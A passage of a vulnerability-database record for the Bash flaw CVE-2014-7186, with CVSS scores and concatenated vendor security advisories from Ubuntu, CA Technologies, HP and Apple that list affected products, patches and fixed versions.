"https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2014-7186", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-7186", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-1072", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2014-7186", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "db": "NVD", "id": "CVE-2014-7186" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the \"redir_stack\" issue. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution. GNU Bash is prone to a local memory-corruption vulnerability. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nGNU Bash 3.2 and later are vulnerable; prior versions may also be affected. \n\nNOTE: This vulnerability can only be exploited if the attacker already has\nvalid administrative login credentials. ============================================================================\nUbuntu Security Notice USN-2364-1\nSeptember 27, 2014\n\nbash vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Bash. (CVE-2014-7186,\nCVE-2014-7187)\n\nIn addition, this update introduces a hardening measure which adds prefixes\nand suffixes around environment variable names which contain shell\nfunctions. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n bash 4.3-7ubuntu1.4\n\nUbuntu 12.04 LTS:\n bash 4.2-2ubuntu2.5\n\nUbuntu 10.04 LTS:\n bash 4.1-2ubuntu3.4\n\nIn general, a standard system update will make all the necessary changes. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCA20141001-01: Security Notice for Bash Shellshock Vulnerability\n\n\nIssued: October 01, 2014\nUpdated: October 03, 2014\n\n\nCA Technologies is investigating multiple GNU Bash vulnerabilities, \nreferred to as the \"Shellshock\" vulnerabilities, which were publicly \ndisclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271, \nCVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and \nCVE-2014-6278 have been assigned to these vulnerabilities. \n\nThe CA Technologies Enterprise Information Security team has led a \nglobal effort to identify and remediate systems and products discovered \nwith these vulnerabilities. We continue to patch our systems as fixes \nbecome available, and we are providing fixes for affected CA \nTechnologies products. \n\nCA Technologies continues to aggressively scan our environments \n(including servers, networks, external facing applications, and SaaS \nenvironments) to proactively monitor, identify, and remediate any \nvulnerability when necessary. \n\n\nRisk Rating\n\nHigh\n\n\nPlatform\n\nAIX\nAndroid (not vulnerable, unless rooted)\nApple iOS (not vulnerable unless jailbroken)\nLinux\nMac OS X\nSolaris\nWindows (not vulnerable unless Cygwin or similar ported Linux tools \n with Bash shell are installed)\nOther UNIX/BSD based systems if Bash is installed\nAny other OS or JeOS that utilizes Bash\n\n\nAffected Products\n\nThe following products have been identified as potentially vulnerable, \nand we have made fixes available for all of these products. \n\nCA API Management (Linux appliance only)\n\nCA Application Performance Management (TIM is the only affected APM \n component)\n\nCA Application Performance Management Cloud Monitor\n\nCA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)\n\nCA Layer 7 products (API Gateway, Mobile Access Gateway, API Management \n Portal)\n\nCA User Activity Reporting Module (Enterprise Log Manager)\n\nNote: This security notice will be updated if other CA Technologies \nproducts are determined to be vulnerable. \n\nIn most cases, the Bash vulnerabilities will need to be patched by OS \nvendors. Exceptions may include CA Technologies appliances, and \nsoftware products that include Linux, UNIX or Mac OS X based operating \nsystems (that include Bash). \n\n\nAffected Components\n\nCentOS\nCygwin\nGNU Bash\nRed Hat Enterprise Linux\nSUSE Linux\n\n\nNon-Affected Products\n\nIMPORTANT NOTE: This listing includes only a small subset of the \nunaffected CA Technologies products. We\u0027re including unaffected \nproducts that customers have already inquired about. While the \nfollowing CA Technologies products are not directly affected by the \nBash vulnerabilities, the underlying operating systems that CA \nTechnologies software is installed on may be vulnerable. We strongly \nencourage our customers to follow the recommendations provided by their \nvendors for all operating systems they utilize. \n\nAll CA SaaS / On Demand products were either not vulnerable or have \nalready been patched. \n\nCA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does \nnot execute CGI scripts, or spawn or execute shell commands from within \nthe app. AHS infrastructure already patched. \n\nCA Asset Portfolio Management\n\nCA AuthMinder (Arcot WebFort)\n\nCA AuthMinder for Business Users\n\nCA AuthMinder for Consumers\n\nCA AutoSys products - We use the bash shell that comes with the \noperating system and the customer is responsible for patching their OS. \nAdditionally, the agents themselves do not distribute any scripts that \nuse bash. \n\nCA Clarity On Demand\n\nCA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or \nuse it, but because we are deployed on RHEL, customers may be \nindirectly affected. Customers using RHEL should apply patches provided \nby Red Hat. \n\nCA Console Management for OpenVMS - Our OpenVMS products do not bundle \nbash, and they do not supply bash scripts; we use nothing but the \nnative DCL CLI. \n\nCA ControlMinder\n\nCA DataMinder (formerly DLP) products \u2013 Software and appliance \nconfirmed not vulnerable. Note: Linux Agents shipped, but no public SSH \nor Web apps are used in these agents. Customers should patch bash shell \non any Linux server with DataMinder agents. DataMinder agents should \ncontinue to function normally. \n\nCA Digital Payments SaaS (previously patched)\n\nCA Directory\n\nCA eCommerce SaaS / On Demand (previously patched)\n\nCA Endevor Software Change Manager\n\nCA Federation (formerly SiteMinder Federation)\n\nCA GovernanceMinder\n\nCA IdentityMinder\n\nCA Infrastructure Management\n\nCA JCLCheck\n\nCA Job Management for OpenVMS - Our OpenVMS products do not bundle \nbash, and they do not supply bash scripts; we use nothing but the \nnative DCL CLI. \n\nCA NetQoS GigaStor Observer Expert\n\nCA Network Flow Analysis\n\nCA Performance Management for OpenVMS - Our OpenVMS products do not \nbundle bash, and they do not supply bash scripts; we use nothing but \nthe native DCL CLI. \n\nCA RiskMinder\n\nCA Service Desk Manager\n\nCA Service Operations Insight (SOI)\n\nCA SiteMinder\n\nCA SOLVE:Access\n\nCA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes \nfrom your underlying operating system vendor. \n\nCA Strong Authentication\n\nCA System Watchdog for OpenVMS - Our OpenVMS products do not bundle \nbash, and they do not supply bash scripts; we use nothing but the \nnative DCL CLI. \n\nCA Top Secret\n\nCA Universal Job Management Agent for OpenVMS - Our OpenVMS products do \nnot bundle bash, and they do not supply bash scripts; we use nothing \nbut the native DCL CLI. \n\nCA Virtual Assurance for Infrastructure Managers (VAIM)\n\n\nSolution\n\nCA Technologies has issued the following fixes to address the \nvulnerabilities. \n\nCA API Management:\nPatches for Linux appliance are available through CA Support to \ncustomers of Gateway (applicable for all versions \u2013 6.1.5, 6.2, 7.0, \n7.1, 8.0, 8.1, 8.1.1, 8.1.02). \n\nCA Application Performance Management:\nKB article for APM TIM has been published. APM TIM is the only part of \nAPM that was affected. Refer to TEC618037. \n\nCA Application Performance Management Cloud Monitor:\nNew images are available for subscribers. Download the latest OPMS \nversion 8.2.1.5. For assistance, contact CA Support. \n\nCA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM):\nVery low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do \nnot use Bash at all for the CEM operating system that we have shipped \nin the past. This means that customers who patch the OS will not impact \nthe ability of the CEM TIMsoft from operating. However prior to version \n9.6, the TIM installation script does use the bash shell. See new KB \narticle TEC618037 for additional information. \n\nCA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal):\nFixes for all Bash vulnerabilities and a security bulletin are available \non the Layer 7 Support website. \n\nCA User Activity Reporting Module (Enterprise Log Manager):\nAll 12.5 and 12.6 GA versions are potentially affected. Patches \nprovided on 2014-09-30. To get the patch, use the OS update \nfunctionality to get the latest R12.6 SP1 subscription update. Note \nthat you can update R12.5 SPx with the R12.6 SP1 OS update. For \nassistance, contact CA Support. \n\n\nWorkaround\n\nNone\n\nTo help mitigate the risk, we do strongly encourage all customers to \nfollow patch management best practices, and in particular for operating \nsystems affected by the Bash Shellshock vulnerabilities. \n\n\nReferences\n\nCVE-2014-6271 - Bash environment variable command injection\nCVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271\nCVE-2014-7186 - Bash parser redir_stack memory corruption\nCVE-2014-7187 - Bash nested flow control constructs off-by-one\nCVE-2014-6277 - Bash untrusted pointer use uninitialized memory\nCVE-2014-6278 - Bash environment variable command injection\n\nCA20141001-01: Security Notice for Bash Shellshock Vulnerability\nhttps://support.ca.com/irj/portal/anonymous/phpsbpldgpg\n\n\nChange History\n\nv1.0: 2014-10-01, Initial Release\nv1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM, \n Clarity OD, All SaaS/OD products to list of Non-Affected Products. \nv1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated \n UARM solution info. \n\n\nIf additional information is required, please contact CA Technologies \nSupport at https://support.ca.com. \n\nIf you discover a vulnerability in CA Technologies products, please \nreport your findings to the CA Technologies Product Vulnerability \nResponse Team at vuln@ca.com. \nPGP key:\nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\nSecurity Notices\nhttps://support.ca.com/irj/portal/anonymous/phpsbpldgpg\n\n\nRegards,\nKen Williams\nDirector, Product Vulnerability Response Team\nCA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com\nKen.Williams@ca.com | vuln@ca.com\n\n\nCopyright \u00a9 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. \n11749. All other trademarks, trade names, service marks, and logos \nreferenced herein belong to their respective companies. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: Encryption Desktop 10.3.2 (Build 15238)\nCharset: utf-8\n\nwsBVAwUBVDK+PZI1FvIeMomJAQFl/Af/TqrSE/h4r3gs9PwrWKdt21PCRI3za9Lx\nM5ZyTdVDIQ9ybgPkLqsovNRPgVqd7zwDHsx0rzvF5Y82uO+vQ63BuEV2GnczAax/\nEiAW4WVxUgWG+lAowGV55Of8ruv/gOiAWTjFhkqpsyVg96ZMw2HLG62IwZL1j0qa\noLCu0y3VrGvqH0g2hi75QwHAjNCdlEsD4onUqTCc9cRTdLwFCZrUQ8KTrqIL7LK5\nUo5T9C1UeAyNTo3KiJ/zw3BCOTkpl99dmg3NW0onU/1r1CXdlyS7opLB+GJ+xGwP\nxRQdUsOIhzfRzx7bsao2D43IhDnzJBBFJHdeMPo18WBTfJ7aUgBwGQ==\n=B62b\n-----END PGP SIGNATURE-----\n. \n\n HP Product\n Firmware Version\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 2\n 680H_GS40701\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 1\n 656H_GS10801\n\n The firmware is customer installable and is available in the Drivers,\nSoftware \u0026 Firmware section at the following location:\n\n http://www.hp.com/support/eslg3\n\n Notes:\n\n - Updating the library firmware requires a reboot of the library. \n - If the library firmware cannot be updated, HP recommends following the\nMitigation Instructions below. \n\n - Disable DHCP and only use static IP addressing. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-09-30-3 OS X El Capitan 10.11\n\nOS X El Capitan 10.11 is now available and addresses the following:\n\nAddress Book\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to inject arbitrary code to\nprocesses loading the Address Book framework\nDescription: An issue existed in Address Book framework\u0027s handling\nof an environment variable. This issue was addressed through improved\nenvironment variable handling. \nCVE-ID\nCVE-2015-5897 : Dan Bastone of Gotham Digital Science\n\nAirScan\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker with a privileged network position may be able\nto extract payload from eSCL packets sent over a secure connection\nDescription: An issue existed in the processing of eSCL packets. \nThis issue was addressed through improved validation checks. \nCVE-ID\nCVE-2015-5853 : an anonymous researcher\n\napache_mod_php\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.27, including one which may have led to remote code execution. \nThis issue was addressed by updating PHP to version 5.5.27. \nCVE-ID\nCVE-2014-9425\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9705\nCVE-2014-9709\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0235\nCVE-2015-0273\nCVE-2015-1351\nCVE-2015-1352\nCVE-2015-2301\nCVE-2015-2305\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2783\nCVE-2015-2787\nCVE-2015-3329\nCVE-2015-3330\n\nApple Online Store Kit\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may gain access to a user\u0027s keychain\nitems\nDescription: An issue existed in validation of access control lists\nfor iCloud keychain items. This issue was addressed through improved\naccess control list checks. \nCVE-ID\nCVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of\nIndiana University, Tongxin Li of Peking University, Tongxin Li of\nPeking University, Xiaolong Bai of Tsinghua University\n\nAppleEvents\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A user connected through screen sharing can send Apple\nEvents to a local user\u0027s session\nDescription: An issue existed with Apple Event filtering that\nallowed some users to send events to other users. This was addressed\nby improved Apple Event handling. \nCVE-ID\nCVE-2015-5849 : Jack Lawrence (@_jackhl)\n\nAudio\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Playing a malicious audio file may lead to an unexpected\napplication termination\nDescription: A memory corruption issue existed in the handling of\naudio files. This issue issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:\nProf. Taekyoung Kwon), Yonsei University, Seoul, Korea\n\nbash\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in bash\nDescription: Multiple vulnerabilities existed in bash versions prior\nto 3.2 patch level 57. These issues were addressed by updating bash\nversion 3.2 to patch level 57. \nCVE-ID\nCVE-2014-6277\nCVE-2014-7186\nCVE-2014-7187\n\nCertificate Trust Policy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Update to the certificate trust policy\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork Cookies\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a privileged network position can track a\nuser\u0027s activity\nDescription: A cross-domain cookie issue existed in the handling of\ntop level domains. The issue was address through improved\nrestrictions of cookie creation. \nCVE-ID\nCVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork FTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Malicious FTP servers may be able to cause the client to\nperform reconnaissance on other hosts\nDescription: An issue existed in the handling of FTP packets when\nusing the PASV command. This issue was resolved through improved\nvalidation. \nCVE-ID\nCVE-2015-5912 : Amit Klein\n\nCFNetwork HTTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A maliciously crafted URL may be able to bypass HSTS and\nleak sensitive data\nDescription: A URL parsing vulnerability existed in HSTS handling. \nThis issue was addressed through improved URL parsing. \nCVE-ID\nCVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork HTTPProtocol\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: An issue existed in the handling of HSTS state in\nSafari private browsing mode. This issue was addressed through\nimproved state handling. \nCVE-ID\nCVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd\n\nCFNetwork Proxies\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Connecting to a malicious web proxy may set malicious\ncookies for a website\nDescription: An issue existed in the handling of proxy connect\nresponses. This issue was addressed by removing the set-cookie header\nwhile parsing the connect response. \nCVE-ID\nCVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork SSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: A certificate validation issue existed in NSURL when a\ncertificate changed. This issue was addressed through improved\ncertificate validation. \nCVE-ID\nCVE-2015-5824 : Timothy J. Wood of The Omni Group\n\nCFNetwork SSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to decrypt data protected by SSL\nDescription: There are known attacks on the confidentiality of RC4. \nAn attacker could force the use of RC4, even if the server preferred\nbetter ciphers, by blocking TLS 1.0 and higher connections until\nCFNetwork tried SSL 3.0, which only allows RC4. This issue was\naddressed by removing the fallback to SSL 3.0. \n\nCoreCrypto\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to determine a private key\nDescription: By observing many signing or decryption attempts, an\nattacker may have been able to determine the RSA private key. This\nissue was addressed using improved encryption algorithms. \n\nCoreText\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team\n\nDev Tools\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in dyld. This was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-5876 : beist of grayhash\n\nDev Tools\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An application may be able to bypass code signing\nDescription: An issue existed with validation of the code signature\nof executables. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5839 : @PanguTeam\n\nDisk Images\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in DiskImages. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5847 : Filippo Bigarella, Luca Todesco\n\ndyld\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An application may be able to bypass code signing\nDescription: An issue existed with validation of the code signature\nof executables. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5839 : TaiG Jailbreak Team\n\nEFI\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application can prevent some systems from\nbooting\nDescription: An issue existed with the addresses covered by the\nprotected range register. This issue was fixed by changing the\nprotected range. \nCVE-ID\nCVE-2015-5900 : Xeno Kovah \u0026 Corey Kallenberg from LegbaCore\n\nEFI\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious Apple Ethernet Thunderbolt adapter may be able\nto affect firmware flashing\nDescription: Apple Ethernet Thunderbolt adapters could modify the\nhost firmware if connected during an EFI update. This issue was\naddressed by not loading option ROMs during updates. \nCVE-ID\nCVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare\n\nFinder\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The \"Secure Empty Trash\" feature may not securely delete\nfiles placed in the Trash\nDescription: An issue existed in guaranteeing secure deletion of\nTrash files on some systems, such as those with flash storage. This\nissue was addressed by removing the \"Secure Empty Trash\" option. \nCVE-ID\nCVE-2015-5901 : Apple\n\nGame Center\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious Game Center application may be able to access a\nplayer\u0027s email address\nDescription: An issue existed in Game Center in the handling of a\nplayer\u0027s email. This issue was addressed through improved access\nrestrictions. \nCVE-ID\nCVE-2015-5855 : Nasser Alnasser\n\nHeimdal\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to replay Kerberos credentials to\nthe SMB server\nDescription: An authentication issue existed in Kerberos\ncredentials. This issue was addressed through additional validation\nof credentials using a list of recently seen credentials. \nCVE-ID\nCVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu\nFan of Microsoft Corporation, China\n\nICU\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in ICU\nDescription: Multiple vulnerabilities existed in ICU versions prior\nto 53.1.0. These issues were addressed by updating ICU to version\n55.1. \nCVE-ID\nCVE-2014-8146\nCVE-2014-8147\nCVE-2015-5922\n\nInstall Framework Legacy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to gain root privileges\nDescription: A restriction issue existed in the Install private\nframework containing a privileged executable. This issue was\naddressed by removing the executable. \nCVE-ID\nCVE-2015-5888 : Apple\n\nIntel Graphics Driver\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: Multiple memory corruption issues existed in the Intel\nGraphics Driver. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5830 : Yuki MIZUNO (@mzyy94)\nCVE-2015-5877 : Camillus Gerard Cai\n\nIOAudioFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in IOAudioFamily that led to the\ndisclosure of kernel memory content. This issue was addressed by\npermuting kernel pointers. \nCVE-ID\nCVE-2015-5864 : Luca Todesco\n\nIOGraphics\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues existed in the\nkernel. These issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5871 : Ilja van Sprundel of IOActive\nCVE-2015-5872 : Ilja van Sprundel of IOActive\nCVE-2015-5873 : Ilja van Sprundel of IOActive\nCVE-2015-5890 : Ilja van Sprundel of IOActive\n\nIOGraphics\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in IOGraphics which could have led to\nthe disclosure of kernel memory layout. This issue was addressed\nthrough improved memory management. \nCVE-ID\nCVE-2015-5865 : Luca Todesco\n\nIOHIDFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOHIDFamily. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5866 : Apple\nCVE-2015-5867 : moony li of Trend Micro\n\nIOStorageFamily\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to read kernel memory\nDescription: A memory initialization issue existed in the kernel. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5863 : Ilja van Sprundel of IOActive\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues existed in the\nKernel. These issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team\nCVE-2015-5896 : Maxime Villard of m00nbsd\nCVE-2015-5903 : CESG\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local process can modify other processes without\nentitlement checks\nDescription: An issue existed where root processes using the\nprocessor_set_tasks API were allowed to retrieve the task ports of\nother processes. This issue was addressed through additional\nentitlement checks. \nCVE-ID\nCVE-2015-5882 : Pedro Vilaca, working from original research by\nMing-chieh Pan and Sung-ting Tsai; Jonathan Levin\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may control the value of stack cookies\nDescription: Multiple weaknesses existed in the generation of user\nspace stack cookies. These issues were addressed through improved\ngeneration of stack cookies. \nCVE-ID\nCVE-2013-3951 : Stefan Esser\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker may be able to launch denial of service attacks\non targeted TCP connections without knowing the correct sequence\nnumber\nDescription: An issue existed in xnu\u0027s validation of TCP packet\nheaders. This issue was addressed through improved TCP packet header\nvalidation. \nCVE-ID\nCVE-2015-5879 : Jonathan Looney\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a local LAN segment may disable IPv6 routing\nDescription: An insufficient validation issue existed in the\nhandling of IPv6 router advertisements that allowed an attacker to\nset the hop limit to an arbitrary value. This issue was addressed by\nenforcing a minimum hop limit. \nCVE-ID\nCVE-2015-5869 : Dennis Spindel Ljungmark\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed that led to the disclosure of kernel\nmemory layout. This was addressed through improved initialization of\nkernel memory structures. \nCVE-ID\nCVE-2015-5842 : beist of grayhash\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in debugging interfaces that led to\nthe disclosure of memory content. This issue was addressed by\nsanitizing output from debugging interfaces. \nCVE-ID\nCVE-2015-5870 : Apple\n\nKernel\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A state management issue existed in debugging\nfunctionality. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team\n\nlibc\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse\nCorporation\n\nlibpthread\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team\n\nlibxpc\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Many SSH connections could cause a denial of service\nDescription: launchd had no limit on the number of processes that\ncould be started by a network connection. This issue was addressed by\nlimiting the number of SSH processes to 40. \nCVE-ID\nCVE-2015-5881 : Apple\n\nLogin Window\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The screen lock may not engage after the specified time\nperiod\nDescription: An issue existed with captured display locking. The\nissue was addressed through improved lock handling. \nCVE-ID\nCVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau\ninformationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni\nVaahtera, and an anonymous researcher\n\nlukemftpd\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A remote attacker may be able to deny service to the FTP\nserver\nDescription: A glob-processing issue existed in tnftpd. This issue\nwas addressed through improved glob validation. \nCVE-ID\nCVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com\n\nMail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Printing an email may leak sensitive user information\nDescription: An issue existed in Mail which bypassed user\npreferences when printing an email. This issue was addressed through\nimproved user preference enforcement. \nCVE-ID\nCVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,\nDennis Klein from Eschenburg, Germany, Jeff Hammett of Systim\nTechnology Partners\n\nMail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker in a privileged network position may be able to\nintercept attachments of S/MIME-encrypted e-mail sent via Mail Drop\nDescription: An issue existed in handling encryption parameters for\nlarge email attachments sent via Mail Drop. The issue is addressed by\nno longer offering Mail Drop when sending an encrypted e-mail. \nCVE-ID\nCVE-2015-5884 : John McCombs of Integrated Mapping Ltd\n\nMultipeer Connectivity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to observe unprotected\nmultipeer data\nDescription: An issue existed in convenience initializer handling in\nwhich encryption could be actively downgraded to a non-encrypted\nsession. This issue was addressed by changing the convenience\ninitializer to require encryption. \nCVE-ID\nCVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem\n\nNetworkExtension\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An uninitialized memory issue in the kernel led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory initialization. \nCVE-ID\nCVE-2015-5831 : Maxime Villard of m00nbsd\n\nNotes\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to leak 